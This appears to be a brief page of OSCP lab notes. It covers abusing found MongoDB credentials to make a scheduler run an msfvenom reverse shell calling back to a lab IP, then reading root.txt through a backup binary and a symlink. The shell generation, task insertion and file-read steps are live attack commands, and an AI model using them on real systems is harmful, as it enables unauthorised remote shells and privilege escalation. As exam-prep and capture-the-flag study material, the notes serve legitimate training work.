O
O
OSCP Notes
Search
K
Comment on page

mongo db creds found?

try:
mongo -u username -p PASS authSource(i.e scheduler)
note db.collection('NAME') for database name.
msfvenom -p cmd/unix/reverse_python lhost=10.10.16.1 lport=9999 R
upload the shell to the victim.
then do: on victim
db.tasks.insert({ "cmd": "/bin/bash /tmp/shell.sh;" } );
WriteResult({ "nInserted" : 1 })
Back up key found?
copy the key and use it with:
./backup -q hashes /tmp
this will create base64 file.
decide it and see what kind of file it is.
---
Link root.txt to a tmp file;
mkdir /tmp/gori
ln -s /root/root.txt /tmp/gori
/usr/local/bin/backup -q pass /tmp/gori > xxx
cat xxx | base64 --decode > xxx-d